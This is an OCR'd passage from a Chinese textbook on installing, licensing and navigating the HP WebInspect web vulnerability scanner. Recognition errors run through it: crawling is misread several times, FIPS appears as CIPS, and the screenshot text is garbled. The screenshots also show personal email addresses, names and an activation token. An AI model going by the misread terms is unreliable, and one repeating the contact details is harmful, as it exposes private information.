以 及 对 任意 Web 应 用 程序 提供 更 准确 的 扫描 结果 。 

1. 闪存 的 静态 分 析 


WebInspect 可 反 编 译 Shockwave Flash SWF 文件 的 最 新 版 本 ， 然 后 对 产生 的 ActionScript 3 
代码 执行 静态 分 析 来 检测 漏洞 ， 如 不 安全 的 编程 实践 、 不 安全 的 应 用 程序 部 署 、 违 反 Adobe 
“最 佳 实践 ”的 行为 以 及 信息 泄露 。 
2. 新 报告 系统 


WebInspect 新 版 本 的 和 强大 的 报告 系统 有 助 于 分 析 和 演示 数据 。 用 户 通 过 新 报告 系统 可 
执行 以 下 操作 : 

。 创建 灵活 的 、 可 扩展 的 报告 ， 并 且 采 用 改进 的 、 速 度 更 快 的 新 一 代 工 作 流程 ; 

。 修改 标准 报告 或 使 用 新 的 报告 设计 器 来 设计 自己 的 报告 

。 从 外 部 数据 源 中 提取 信息 ; 

。 新 报告 样式 编辑 器 自 定义 字体 、 颜 色 和 背景 等 ; 

。 生成 专业 的 扫描 报告 ; 

。 用 新 的 会 话 报告 重点 分 析 单 个 会 话 。 

3. 可 选 的 深度 优先 改行 

深度 优先 怜 行 最 适合 基于 顺序 浏览 的 这 一 类 网 站 (例如 在 访问 页 面 B 之 前 必须 先 访问 页 
面 A)。 该 方法 会 根据 第 一 个 网 页 A 的 第 一 个 链接 到 达 此 链接 指向 的 网 页 B 的 第 一 个 链接 ， 
只 有 在 访问 网 页 B 的 所 有 链接 后 ,再 返回 网 页 A 去 访问 第 二 个 链接 ， 依 此 类 推 。 与 此 相对 应 
的 是 ， 广 度 优先 疏 行 (也 是 另 一 种 可 行 的 方式 ) 首 先 会 访问 网 页 A 的 所 有 链接 ， 再 逐次 访问 网 
页 中 每 个 链接 所 对 应 的 网 页 。 
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4. Java MVC 框架 支持 


通过 HP DevInspectJava 团队 的 深入 研究 , WebInspect 已 经 能 够 使 用 基于 路 径 攻击 和 导航 
参数 的 深度 优先 爬行 方法 ， 支 持 建立 在 Java MVC 平台 上 的 应 用 程序 。 


5. 使 用 IBM Rational ClearQuest 集成 


9.2.1 


户 可 以 直接 将 漏洞 缺陷 发 送 到 IBM Rational ClearQuest 版 本 7 中 。 


92 ”软件 安装 


最 低 配 置 


在 安装 WebInspect 之 前 ， 请 用 户 确保 系统 满足 以 下 最 低 要 求 : 


支持 的 操作 系统 : Windows XP 专业 版 SP3(32 位 )，Windows Server 2003 标准 SP2(32 
位 )，Windows Vista SP1 的 (32 位 或 64 f), Windows 7 SP1(32 位 或 64 位 ); 
处 理 器 : "GE LS GHz( 推 荐 双核 2.5 GHz 或 更 高 频率 ); 
内 存 : 1 GB( 建 议 4GB); 
硬盘 空闲 空间 : 2 GB( 建 议 20 GB); 
网 络 : 一 个 有 效 的 Intemet 连接 (推荐 更 新 ); 
显示 器 : 1024x768( 推 荐 1280 x 1024); 
数据 库 : Microsoft SQL Server 2005 Express 版 SP3 或 SQL Server 2005 标准 版 SP3( 推 
荐 SQL Server 2008 R2 SP2). 


当 使 用 SQL Server Express 版 ， 扫 描 数 据 不 得 超过 4GB。 对 于 较 大 扫描 ， 或 允许 共享 扫 
描 数 据 ， 使 用 SQL Server 2008 标准 版 。 


平台 : Microsoft NET Framework 3.5 SP1( 推 荐 4.0); 
浏览 器 :Microsoft Intemet Explorer 7.0( 推 荐 9.0); 
PDF 支持 : Adobe Reader 8.1.2 或 9.0( 仅 用 于 在 导出 的 PDF 中 查看 报告 内 容 )。 


不 支持 测试 版 本 的 操作 系统 、 服 务 包 以 及 第 三 方 组 件 (比如 Microsoft SQL Server Express)。 
当 安 装 SQL Server Express 版 时 , 接受 所 有 默认 设置 ; WebInspect 默认 实例 名 是 SQLEX 
PRESS。 惠 普 还 建议 选择 “隐藏 高 级 安装 选项 ”和 “添加 当前 用 户 为 数据 库 管理 员 ” 的 复 


SQL Server 2008 的 标准 版 可 安装 在 本 地 主机 或 附近 并 列 的 主机 上 。 在 WebInspect 中 , 可 
通过 单 击 Edit( 编 辑 ) 一 Application Settings( 应 用 程序 设置 ) 一 Database( 数 据 库 ) 来 配置 该 选项 。 


9.22 


1. 


下 载 和 安装 Weblnspect 


下 载 


Weblnspect 的 官方 网 站 是 http://www8 hp.com/cn/zh/software-solutions/software.html? software. 
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html? compURI=1341991， 登 录 该 网 站 ， 单 击 试用 版 与 演示 的 下 拉 菜 单 ， 即 可 下 载 目前 最 新 
版 本 的 WebInspect 10.20， 如 图 9-1 所 示 。 

仔细 阅读 HP WebInspect 10.20 软件 的 下 载 使 用 条 款 ， 单 击 “ 我 同意 ” 即 可 进入 到 下 载 界 
面 ， 如 图 9-2 所 示 。 

可 以 下 载 时 , 使 用 HP WebInspect Manager 或 标准 下 载 ( 即 迅雷 下 载 ), 建议 使 用 迅雷 下 载 ， 
如 图 9-3 所 示 。 


Webinspect 


通过 模拟 实际 攻击 来 测试 Web 应 用 。 


HP Weblnspect 10.20 英 文 软件 电子 介质 评估 版 


图 9-1 WebInspect 10.20 下 载 界面 (1) 


O 个 人 信息 ) 6 ESRR 
HP Weblnspect10.20 3 子 介质 评估 版 


软件 下 载 使 用 条 款 


SEFERDE- 
» 


erkmwaemtkt. BECOURTRIG« DRDUECETERCARTISURB ORTI. RHENUS 
FARE PER EF REPRE TRES 


图 9-2 WebInspect 10.20 下 载 使 用 条 款 


[EST O ra 

HP Weblnspect 10.20 英文 软件 电子 介 
请 首先 查看 此 内 容 : 

Letter, HP VII 1020 


© ror 0.05 ws 


您 现在 可 以 下 载 软件 以 及 相关 支持 资源 了 。 


Software, Webinspect 10.20 1526M8 


Letter, HP WI 10.20 0.05 MB 


图 9-3 WebInspect 10.20 下 载 界面 (2) 
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2. 安装 

下 载 的 WebInspect 软件 是 ISO 镜像 文件 ， 需 要 在 DAEMON Tools Lite 软件 中 打开 ， 如 
图 9-4 所 示 。 在 联网 条 件 下 安装 Weblnspect 时 ， 如 果 本 地 计算 机 没有 安装 Microsoft NET 
Framework 4.0, 系统 会 提示 安装 .在 安装 WebInspect 时 , 系统 检测 计算 机 是 否 已 安装 Microsoft 
SQL Server 2008 R2 Express SP2 或 者 更 高 级 版 本 ， 有 则 直接 安装 WebInspect; 没有 ， 系 统 先 
默认 安装 Microsoft SQL Server 2008 R2 Express SP2， 然 后 安装 WebInspect。 


HP WebiInspect 10.20 


图 9-4 WeblInspect 软件 的 ISO 镜像 文件 在 DAEMON Tools Lite 软件 中 打开 后 的 界面 


接 下 来 按照 下 列 步骤 来 安装 WebInspect: 
1) 启动 安装 程序 。 
2) 在 欢迎 界面 上 ， 单 击 Next( 下 一 步 )， 如 图 9-5 所 示 。 


Welcome to the HP WebInspect 10.20 
Setup Wizard 


The Setup Wizard will install HP WebInspect 10.20 on your 
computer. Click Next to continue or Cancel to exit the Setup 
Wizard. 


图 9-5 ”安装 Weblnspect 10.20 欢迎 界面 


3) 查看 许可 协议 .如 果 接受 ,请 选中 该 复 选 框 并 单 击 Next( 下 一 步 ); 否则 请 单 击 Cancel( 取 
消 )。 
4) 在 目标 文件 夹 窗口 中 ， 选 择 要 安装 的 软件 文件 夹 ， 然 后 单 击 Next( 下 一 步 )。 
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5) 如 果 要 安装 WebInspect 作为 评估 管理 平台 (AMP) 的 检测 部 件 ， 可 参见 图 9-6。 


r — - x 
Le m] 
M icti pecado “= 
Sensor Configuration ! 
Configure WebInspect as a Sensor for this installation (optional). S> 
| ]Konfigure Webinspect as a Sensori 


Enterpri: 


anager URL: 


Sensor Authentication 
User Name: 


Password: 


Comfirm Password: 


li <e) in) [cms ] 


图 9-6 ”安装 WeblInspect 10.20 配置 界面 


a) 选择 配置 WebInspect 作为 AMP 的 检测 部 件 。 

b) 输入 AMP 管理 器 的 URL. 

c) 在 检测 部 件 验 证 组 中 ， 输 入 这 个 检测 部 件 的 Windows 账户 证 书 。 
6) 单 击 Next( 下 一 步 )。 

7) 在 准备 安装 窗口 中 ， 单 击 Install( 安 装 )。 

8) 当 这 个 过 程 完成 后 ， 单 击 Finish( 完 成 )， 如 图 9-7 所 示 。 


(49 HP Weblnspect 10.20 Setup tel] 


Completed the HP WebInspect 10.20 
Setup Wizard 


Click the Finish button to exit the Setup Wizard. 


国 Launch HP Webinspect 10.20 


sx Jmm] (ce) 


图 9-7 安装 Weblnspect 10.20 完成 界面 


3. 许可 证 
首次 启动 WebInspect， 该 程序 显示 WebInspect 产品 注册 向 导 ， 它 会 提示 选择 下 列 选项 之 
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—, Wi 9-8 所 示 。 


。 现在 激活 ; 
。 注册 一 个 15 天 试用 版 。 
[ET | 
图 9-8 WebInspect 产品 注册 向 导 界 面 
4. 试用 注册 


请 按 以 下 步骤 开始 WebInspect 免费 的 15 天 试用 版 。 

1) 在 WebInspect 产品 注册 向 导 窗 口中 , 选择 Register 15 Day Trial( 注 册 一 个 免费 的 15 天 
试用 版 )， 然 后 单 击 Next( 下 一 步 )。 该 向 导 将 显示 一 个 窗口 ， 提 示 输 入 有 关 用 户 和 用 户 的 公司 
信息 ， 如 图 9-8 所 示 。 

2) 输入 所 要 求 的 信息 。 

3) 如 果 是 通过 Network Proxy( 代 理 服务 器 ) 连 接 到 Intemet， 从 Proxy Profile( 代 理 配 置 ) 文 
件 下 拉 列 表 中 选择 一 个 设置 ， 修 改 设置 (如 有 必要 )， 然 后 单 击 OK( 确 定 )。 

4) 单 击 Next( 下 一 步 )。 

该 步骤 试图 联系 惠普 服务 器 ， 惠 普 服 务 器 将 给 用 户 发 送 一 封 电子 邮件 ， 电 子 邮件 中 包含 
32 个 字符 的 激活 令 牌 。 

5) 单 击 Finish( 完 成 )。 

6) 当 邮 件 到 达 时 ， 单 击 Edit( 编 辑 ) 菜 单 并 选择 Application Settings( 应 用 程序 设置 )。 

7) 在 应 用 程序 设置 窗口 中 ， 从 左边 窗 格 中 选择 License( 许 可 证 )。 

8) 输入 32 位 数 的 license token( 许 可 证 令 牌 ), 忽略 任何 可 能 出 现在 字符 串 的 连 字 符 (或 简 
单 地 复制 令 牌 ， 在 令 牌 激活 字段 的 第 一 个 块 定位 光标 ， 然 后 按 Ctrl V fb). 

9) 输入 一 个 描述 (可 选 )。 

10) 单 击 OK( 确 定 )。 

5. 现在 激活 

如 果 用 户 从 惠普 的 电子 邮件 中 收 到 一 个 激活 令 牌 ， 请 选择 此 选项 。 

1) 在 WebInspect 产品 注册 向 导 页 面 ， 如 图 9-8 所 示 ， 单 击 Activate Now( 立 即 激活 )。 该 
向 导 将 显示 配置 WebInspect 的 许可 证 窗口 。 
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2) 在 许可 证 方法 组 中 ， 选 择 下 列 选 项 之 一 : 
* Connect directly to HP corporate license server( 直 接连 接 到 惠普 公司 的 许可 证 服务 
38) 许可 证 由 惠普 服务 器 控制 。 
* Connect to local HP License and Infrastructure Manager( 连 接 到 本 地 的 惠普 许可 
证 和 基础 设施 管理 器 ): 许可 证 通过 运行 HP 许可 证 和 基础 设施 管理 器 (LIM) 软 件 的 本 
地 服务 器 进行 控制 。 此 安装 界面 提供 一 个 链接 ， 下 载 HP LIM。 
3) 输入 用 户 信息 组 所 要 求 的 信息 ， 如 图 9-9 所 示 ( 下 面 步骤 使 用 此 方式 在 已 连接 到 
Intemet 条 件 下 激活 )。 
Exec Vieni f C D [E 


Register for a Free 15 Day Trial Step2ot4 
yas verser of wabinape by completing the ferm below. 
m Erde ELS 


User Information 


“rist Name: David 
~ Company Name: np 
M Address line ti 1234 Main St 


Address Line 2: 


"Cy: 


* Zin/pocta Code: 


7 Emaili guojan00 19 163.com 
避 Network Proxy 


Prony Profile 


Hewlett-Packard Privacy Policy [aak | [Mext> |[ Gancal | 
图 9-9 输入 相关 信息 


4) 单 击 Next( 下 一 步 )。 
5) 输入 32 位 数 的 Activation Token( 激 活 令 牌 )， 忽 略 任何 可 能 出 现在 字符 串 的 连 字 符 (或 
简单 地 复制 令 牌 , 在 令 牌 激活 字段 的 第 一 个 块 定位 光标 , 然后 按 Ctrl + V 键 ), 如 图 9-10 所 示 。 


Ed 


| Named License Activation Step 3of4 
Activate Webinzpect with named user licenze. 


Activation Token 
2E906D27 9F6E 406A AC4G OE10CFZADGED 


9 Online Activation 
Licence Service URL:  htspei//icenceServico.HPSmartUpdete.cors 
@ Network proxy 
Proxy profile: [Use Internet Eplore — — | [ Edi. 
© offine Activation 


License Reauest File: 


Coik) Causes [ Cancel ] 


图 9-10 输入 32 位 数 的 许可 证 令 牌 
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6) 单 击 Next( 下 一 步 )。 关于 所 安装 的 许可 证 信息 出 现在 授权 范围 部 分 , 程序 会 显示 用 户 
的 许可 证 信息 并 确认 WebInspect 的 副本 被 激活 ， 如 图 9-11 所 示 。 


D Ucense Wad gi es a "o o "Po 


ER 


Hewlett-Packard Privacy Policy |. Finish 


| Congratulations! Step 4 of 4 
Your copy of WebInspect is now activated. 
if you need heip or support using Wesinspect, please contact us at HPEnterpnseSecurtyinfoGhp.com or by 
calling 1-800-633-3500. 
License Details 


Licensing Method: Direct to HP corporate license server 
Activation Token: ^ 26986427-9f8e-1862-3c46-Oe10cf2adBen 


Expiration Date: 2013/6/14 8:00:00 Order Number: unknown 
Maintenance Date: 2014/6/14 8:00:00 SAID: Unknown 
Last Updated: 2014/5/7 19:39:07 
Purchaser: Xinggang Xuan User: David Thackery 
Jining China HP 
suanxinggangQ 126.com guojun801@163.com 
777-555-1234 


Install Description: GJ-PC(yh) 


Additional Details... 


7) 单 击 


© 


。 图 标 
。 自动 
。 在 整 


。 利用 
。 RH 


图 9-11 WebInspect 激活 完成 界面 


Finish( 完 成 )。 
93 主要 功能 


方式 : 单 击 工具 栏 上 代表 相应 命令 的 图 标 按钮 ; 
执行 Web 应 用 程序 安全 测试 和 评估 ; 

个 生命 周期 中 执行 应 用 程序 安全 测试 和 协作 ; 
最 先进 的 用 户 界面 轻松 运行 交互 式 扫描 ; 

高 级 工具 (HP Security Toolkit) 执行 渗透 测试 ; 
以 支持 任何 Web 应 用 程序 环境 。 


94 本 章 小 结 


本 章 介绍 了 HP Weblnspect 的 主要 特征 、 新 特征 以 及 主要 功能 。HP WebInspect 是 业内 领 


先 的 网 站 应 月 


上 安全 评估 解决 方案 ， 可 以 透彻 分 析 复杂 的 Web 应 用 程序 和 Web 服务 ， 检 测 出 


其 中 是 否 有 安全 漏洞 。 这 套 解决 方案 的 技术 涵盖 面 广泛 、 扫 描 功 能 速度 快 、 漏 洞 说明 与 修复 
知识 丰富 ， 并 能 提供 精确 的 网 站 扫描 结果 。 在 掌握 这 些 必要 的 基本 知识 的 同时 ， 学 会 正确 安 
装 和 激活 WebInspect 是 扫描 网 站 的 前 提 。 
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本 章 导 读 

WebInspect 支持 整个 软件 生存 周期 中 对 Web 应 用 进行 测试 ， 同 时 高 效 管理 测试 结果 。 
用 户 可 以 快速 而 准确 地 自动 执行 Web 应 用 程序 安全 测试 和 Web 服务 安全 测试 ， 从 而 确保 大 
部 分 易 受 攻击 的 输入 点 免 遭 攻击 。WebInspect 安装 也 包括 HP 支持 工具 ， 可 以 帮助 HP 技术 
支持 人 员 分 析 和 解决 用 户 在 使 用 应 用 程序 安全 中 心 产品 遇 到 的 问题 。 本 章 介绍 了 WebInspect 
的 新 功能 和 各 个 按钮 的 用 法 和 测试 步骤 ， 并 简 述 了 各 个 HP 支持 工具 。 

应 掌握 的 知识 要 点 : 

。 了 解 Weblnspect 的 新 功能 

© 使 用 WebInspect 的 步骤 

© 了 解 WebInspect 工具 栏 

* 了 解 WebInspect 菜单 栏 

e 生成 报告 

。 扫描 网 站 

e apai 

。 基础 扫描 

。 Web 服务 扫描 

e 企业 扫描 

。 了 解 HP 支持 工具 

e 测试 报告 的 导出 和 分 析 


10.1 WebInspect 10.20 的 新 功能 和 增强 功能 


惠普 公司 推出 的 Weblnspect 10.20 是 目前 的 最 新 版 本 ， 较 以 往 的 版 本 ，WebInspect 10.20 
具有 如 下 的 新 功能 和 增强 功能 。 


1) 本 地 移动 服务 扫描 

手动 爬行 本 机 移动 应 用 程序 并 捕获 网 络 流量 作为 工作 流 的 宏 。 一 旦 捕获 到 从 Android 或 
iOS 应 用 程序 定向 到 后 端 服务 的 HTTP 流量 后 ， 即 可 使 用 WebInspect 的 一 套 标准 操作 来 进行 
重 放 、 模 糊 测试 和 注入 攻击 等 安全 测试 。 这 是 一 个 专门 添加 到 捆绑 移动 检查 的 新 方法 。 
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2) Weblnspect 代理 改进 

WeblInspect 代理 (原名 SecurityScope) 可 与 WebInspect 在 没有 额外 成 本 的 条 件 下 与 用 户 界 
面 和 扫描 引擎 深度 整合 。 当 存在 兼容 性 时 ， 代 理 兼容 性 由 预 扫 描 分 析 器 检测 和 通过 链接 进行 
安装 ， 并 在 用 户 界面 呈现 。 该 代理 也 采用 一 个 新 的 活跃 模式 运作 , 对 于 WebInspect， 也 可 以 
使 用 攻击 策略 去 提高 精度 和 性 能 。 


3) 7 种 致命 错误 分 类 

Fortify Software 的 安全 研究 小 组 与 加 里 麦 格 劳 博士 (Dr Gary McGraw) 一 起 对 软件 开 
发 的 安全 性 进行 了 7 种 致命 错误 的 分 类 。 这 种 分 类 是 为 了 帮助 开发 人 员 和 安全 人 员 理 解 常见 
的 导致 漏洞 的 编码 错误 类 型 。 当 构建 和 测试 软件 时 ， 通 过 将 这 些 错误 形成 一 个 简单 的 分 类 ， 
开发 人 员 可 以 很 容易 地 识别 导致 安全 漏洞 的 问题 类 别 ， 并 找 出 存在 的 错误 。 


4) FIPS 的 兼容 性 
WebInspect 配置 符合 (美国 ) 联 邦 信息 处 理 标准 (CIPS，Federal Information Processing 
Standards)， 可 在 Windows 环境 下 运行 。 


5) 通过 浏览 器 模拟 对 移动 网 站 的 扫描 

移动 网 站 可 在 自 定义 用 户 代理 下 进行 扫描 ， 或 在 流行 的 移动 平台 用 户 代理 下 进行 扫描 。 
对 于 Android 系统 而 言 ，Safari 或 Chrome 等 浏览 器 都 可 供 选择 。 在 这 种 模式 下 ，WebInspect 
可 以 扫描 该 网 站 的 内 容 ， 因 为 它 将 被 泻 染 到 移动 浏览 器 中 。 


6) Weblnspect API( 应 用 程序 界面 ) 
除了 命令 行 工 具 ，WebInspect 公开 了 REST( 表 述 性 状态 转移 ，Representational State 
Transfer) 服 务 端点 ， 以 允许 远程 客户 配置 、 控 制 和 从 扫描 中 检索 数据 。 


7) 显著 改进 了 JavaScript 引擎 
。 通过 升级 到 最 新 Gecko 引擎 ， 对 HTMLS 和 现代 Web 新 标准 提供 更 好 的 支持 。 
。 通过 智能 办 法 消除 多 余 的 执行 脚本 ， 使 性 能 得 以 改善 。 


8) 更 新 Web 宏 记录 器 

。 KIME HTMLS 记录 支持 ; 
。 改善 准确 性 ; 

。 升级 到 最 新 的 Gecko 引擎 。 


9) 改进 的 HTML5 支持 
DOM 使 用 HIMLS 特性 操作 客户 端 进行 审计 。 


10) 更 新 平台 支持 

* Windows 8 

* Windows Server 2012 
* 正 浏 览 器 10 
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11) 许可 证 和 基础 设施 管理 器 (LIM) 通 过 Weblnspect 交付 安装 
LIM 不 再 分 开 购买 。 安 装 WebInspect 后 ，LIM3.0 是 驻 留 在 文件 系统 中 的 一 个 简单 的 
Windows 安装 程序 文件 。 


12) 自动 检测 CSRF 令 牌 和 重新 配置 扫描 设置 
WebInspect 可 以 自动 检测 CSRF 令 牌 和 重新 配置 扫描 设置 。 


13) BURP 导入 
WebInspect 可 在 WebProxy 工具 中 打开 BURP 文件 ， 导 入 BURP 流量 作为 工作 流 的 宏 。 


14) 增加 了 对 GWT 的 支持 扫描 
WebInspect 增加 了 对 GWT 的 支持 扫描 。 


10.2 使 用 WeblInspect 


10.2.1 基本 介绍 


首次 启动 WebInspect 时 ， 应 用 程序 在 客户 区 显示 Start Page( 开 始 页 ) 选 项 卡 ， 如 图 10-1 

所 示 。 此 选项 卡 显示 超 链接 的 五 大 主要 功能 : 

。 Start a Guided Scan( 启 动向 导 扫 描 ) 

e Start a Basic Scan( 启 动 基础 扫描 ) 

© Start a Web Service Scan( 启 动 Web 服务 扫描 ) 

* Start an Enterprise Scan( 启 动 企业 扫描 ) 

* Generate a Report( 生 成 报告 ) 

* Start SmartUpdate( 启 动 智能 升级 )( 非 功能 


D 


UO Welcome to WebInspect "e 


图 10-1 WeblInspect 打开 界面 
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用 户 可 通过 单 击 窗 格 上 方 条 形 栏 的 左 箭头 图 来 关闭 左 窗 格 。 右 窗 格 中 的 内 容 是 由 按钮 栏 
上 的 选择 按钮 确定 ， 如 图 10-2 所 示 。 


图 10-2 按钮 栏 


按钮 栏 选项 包括 : 

* Home( 首 页 ):; 显示 最 近 打开 的 扫描 列表 、 今 日 进行 的 计划 扫描 、 最 近 生 成 的 报告 ， 
以 及 从 惠普 服务 器 下 载 的 信息 。 

* Manage Scans( 管 理 扫描 ): 显示 先前 进行 的 扫描 列表 ， 用 户 可 以 打开 、 重 命名 或 删除 
列表 。 单 击 Connections( 连 接 ) 选 择 数据 库 : 选择 本 地 (扫描 在 用 户 机 器 上 配置 了 SQL 
Server 2008 Express 数据 库 列表 ) 或 远程 (扫描 在 服务 器 上 或 网 络 上 配置 了 SQL Server 
2008 Standard 的 数据 库 列表 )， 或 选择 两 者 。 

* Manage Schedule( 管 理 计 划 ): 显示 预定 要 执行 的 扫描 列表 。 用 户 可 添加 一 个 扫描 计 
划 表 ， 编 辑 或 删除 一 个 预定 的 扫描 ， 或 手动 启动 扫描 。 

用 户 每 次 启动 一 个 扫描 ， 即 WebInspect 打开 一 个 标记 名 称 或 目标 网 站 描述 的 标签 。 这 项 

工作 区 域 被 分 为 三 个 区 域 ， 导航 窗 格 、 信 息 窗 格 和 摘要 窗 格 ， 如 图 10-3 所 示 。 


图 10-3  WebInspect 的 三 个 工作 区 域 


如 果 用 户 同时 打开 大 量 的 扫描 ， 导 致 没有 足够 的 空间 来 显示 所 有 标签 ， 则 可 以 通过 单 击 
标签 栏 最 右 端的 箭头 于 来 滚动 标签 。 单 击 入 关闭 选 定 的 标签 。 
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10.22 ”导航 窗 格 


在 进行 或 查看 扫描 时 , 导航 窗 格 是 在 WebInspect 窗口 的 左 侧 。 它 包括 Site( 网 站 )、Sequence 
(序列 )、Search( 搜 索 ) 以 及 Step Mode ( 步 模式 ) 按 钮 ， 这 些 按钮 用 来 确定 内 容 (或 “视图 ”)， 如 
图 10-4 所 示 。 

在 导航 窗 格 底部 的 按钮 分 别 对 应 不 同 的 视图 : 网 站 、 序 列 、 搜 索 、 步 模式 。 如 果 未 显示 
所 有 按钮 ， 则 单 击 列表 底部 的 下 拉 按 钮 剧 ， 将 显示 更 多 按钮 。 

1. 网 站 视图 


在 导航 窗 格 中 ，WebInspect 网 站 视图 仅 显示 那些 公布 网 站 层次 结构 的 会 话 ， 以 及 漏洞 会 
被 发 现 的 会 话 。 在 网 站 进行 代行 时 ，WebInspect 选择 每 个 会 话 旁 的 复 选 框 (默认 情况 下 )， 表 
明 会 话 也 将 进行 审计 。 当 进行 连续 仆 行 和 审计 时 (其 中 网 站 被 审计 之 前 进行 完全 扑 行 )， 用 户 
可 通过 清除 相关 的 复 选 框 ， 在 审计 开始 前 放弃 对 该 会 话 进行 审计 。 

网 站 视图 还 包含 两 个 弹出 选项 卡 : Excluded Hosts( 排 除 主机 ) 和 Allowed Hosts Criteria( fù 
许 主机 标准 )， 如 图 10-5 所 示 。 


日 [v] http: ]wven.spidynams A 


m 回 http://zero.webapp 


er 


由 回国 vti. pvc ^ 
由 -回电 vt. ot 

由 mE admin 

Lj aspnet. client 
Ei backup 

属 cai-bin 


国 cooketest 


由 


E 
EI [«1 [S] [S] [s] [S] [S] [S] [S] [S] 


G - {v 
— L | — 
C Excluded Hosts | Allowed ms) 


图 10-4  WeblInspect 的 导航 窗 格 图 10-5 网 站 视图 下 的 排除 主机 和 允许 主机 标准 


1) 排除 主机 

如 果 单 击 Excluded Hosts( 排 除 主机 ) 选 项 卡 (或 鼠标 指针 在 其 上 面 暴 停 )， 该 选项 卡 显示 所 
有 禁止 的 主机 列表 。 这 些 主机 可 在 目标 网 站 内 的 任何 地 方 被 访问 ， 但 不 能 被 扫描 。 要 扫描 这 
些 主机 , 需要 单 击 Default/Current Scan Settings 一 Scan Settings Allowed Hosts( 默 认 /当前 扫描 
设置 一 扫描 设置 一 允许 主机 )， 即 “允许 主机 设置 ”。 
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使 用 Excluded Hosts( 排 除 主机 ) 选 项 卡 ， 用 户 通过 单 击 Add to scan( 添 加 到 扫描 )， 或 Add 
allowed host criteria( 添 加 到 允许 主机 标准 )， 可 选择 要 排除 的 主机 。 如 图 10-6 所 示 。 

Add to scan 会 在 主机 根 目录 下 的 网 站 树 建立 一 个 节点 。WebInspect 将 扫描 该 节点 。 如 果 
用 户 选 择 Default/Current Scan Settings -Scan Settings Session Storage( 默 认 /当前 扫描 设置 一 
扫描 设置 一 会 话 存储 )，WebInspect 将 扫描 整个 主机 。 

在 当前 扫描 设置 中 ,“ 添 加 到 允许 主机 标准 ”， 即 添加 URL 到 允许 主机 列表 中 ， 
WebInspect 将 扫描 指向 该 主机 中 的 所 有 后 续 链接 。 但 当 WebInspect 已 经 扫描 指向 该 主机 上 包 
含 一 个 链接 的 唯一 资源 后 ， 如 果 用 户 在 “允许 主机 标准 ”上 添加 一 个 主机 ， 新 增 的 主机 将 不 
会 被 扫描 。 


2) 允许 主机 标准 

如 果 单 击 Allowed Hosts Criteria( 人 允许 主 机 标准 ) 选 项 卡 (或 鼠标 指针 在 其 上 面 悬 停 )， 则 会 
在 标签 中 显示 指定 WebInspect 扫描 设置 (在 允许 主机 ) 的 URIL( 或 正则 表达 式 )。 

如 果 单 击 Delete( 删 除 ) 或 Add allowed host criteria( 添 加 允许 主机 标准 ), WebInspect 可 以 打 
开 当 前 设置 对 话 框 ， 用 户 可 以 添加 、 编 辑 或 删除 允许 主机 标准 (文字 的 URL. 或 正则 表达 式 表 
示 的 URL)， 如 图 10-7 所 示 。 


Add allowed host criteria 


Add to scan 


AK http://www.microsoft.com:£ 
Ak http://www. DocURL.com:8C 
图 10-6 “排除 主机 选项 卡 图 10-7 允许 主机 标准 选项 卡 
如 果 用 户 添加 一 个 条 目 ，WebInspect 将 扫描 后 续 环节 过 到 的 符合 标准 的 任何 主机 。 然 而 
在 WebInspect 扫描 指向 该 主机 包含 一 个 链接 的 唯一 资源 后 ， 如 果 用 户 再 指定 一 个 主机 ， 新 增 


的 主机 将 不 会 被 扫描 。 同 样 ， 如 果 用 户 删 除了 允许 主机 列表 中 的 条 目 ， 仍 将 扫描 WebInspect 
过 到 的 任何 资源 。 

如 果 要 保存 这 些 设置 便于 将 来 扫描 ， 则 选择 Save settings as( 保 存 设置 )( 在 设置 窗口 左 侧 
窗 格 的 底部 )。 

对 “排除 主机 ”或 “允许 主机 标准 ”进行 修改 前 ， 必 须 暂 停 扫描 。 此 外 ， 增 加 或 删除 主 
机 扫描 是 否 可 用 ， 取 决 于 用 户 暂 停 的 扫描 点 。 例 如 ，WebInspect 已 经 扫描 指向 添加 主机 包含 
一 个 链接 的 唯一 资源 后 ， 如 果 用 户 添 加 一 个 允许 主机 ， 则 新 增 的 主机 将 不 会 被 扫描 。 


2. 序列 视图 
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顺序 图 显示 了 WebInspect 进行 服务 器 扫描 过 程 中 的 显示 顺序 。 
注意 : 在 网 站 视图 和 序列 视图 中 ， 蓝 色 文本 表示 目录 或 文件 ， 由 WebInspect“ 猜 ”到 的 
(而 不 是 通过 链接 发 现 的 ) 资 源 。 例如 , 如 果 目 标 网 站 包含 一 个 名 为 “备份 ” 的 文件 ，WebInspect 
便 会 不 断 提交 请 求 “GET/ 备 份 / HTTP/1.1”， 试 图 去 找到 它 。 


3. 搜索 视图 


搜索 视图 允许 上 
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户 在 各 种 HTTP 消息 组 件 的 所 有 会 话 中 进行 搜索 。 例 如 ， 如 果 从 下 拉 列 


表 中 选择 Response Raw 并 指定 “set-cookie” 作 为 搜索 字符 串 ，WebInspect 便 列 出 每 一 个 会 话 
的 原始 HTTP 响应 中 包含 的 “set-cookie” 命 令 ， 如 图 10-8 所 示 。 


Response Raw v 


set-cookie] v 


URL ^ 
[ S http://zero.webappsecurity.com:8O/cookeetest/SetCc 


[3 http://zero.webappsecurity.com:80/forgot, asp 
Q http://zero,webappsecurity.com:80/forgot2, asp (Que 
D http://zero.webappsecurity .com:80/join, asp. 

D http://zero.webappsecurity .com:80/login.asp 

D http://zero.webappsecurity .com:80/bankogin.asp 
Q http://zero.webappsecurity .com:80/join.asp (Query) 


Di http://zero.webappsecurity .com:80/bankogin.asp (Q V 
| > 


< 


图 10-8 ”搜索 视图 


如 果 要 使 用 搜索 视图 : 

1) 在 导航 窗 格 中 ， 单 击 Search( 搜 索 )( 在 面板 的 底部 )。 
2) 从 最 上 面 的 列表 中 ， 选 择 要 搜索 的 区 域 。 选 项 包括 : 
* Status Code( 状 态 代 码 ) 


* URL( 网 址 ) 


。 Request Raw( 请 求 源 ) 

* Request Method( 请 求 方法 ) 

* Request Post Data( 请 求 发 送 数据 ) 

* Request Post Data Name( 请 求 发 送 数据 名 称 ) 
* Request Post Data Value( 请 求 发 送 数据 值 ) 

* Request Headers( 请 求 头 ) 

* Request Header Name( 请 求 头 名 称 ) 
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* Request Header Value( 请 求 头 值 ) 

* Request Query( 请 求 查询 ) 

* Request Query Name( 请 求 查询 名 称 ) 

* Request Query Value( 请 求 查 询 值 ) 

* Request Cookies( 请 求 的 Cookie) 

* Request Cookie Name( 请 求 的 Cookie 名 称 ) 
* Request Cookie Value( 请 求 的 Cookie fii) 

* Request File Name and Extension( 请 求 文件 名 和 扩展 名 ) 
* Request File Name( 请 求 文件 名 ) 

* Request File Extension( 请 求 文件 扩展 名 ) 

* Request Path( 请 求 路 径 ) 

* Response Raw( 响 应 源 ) 

* Response Headers( 响 应 头 ) 

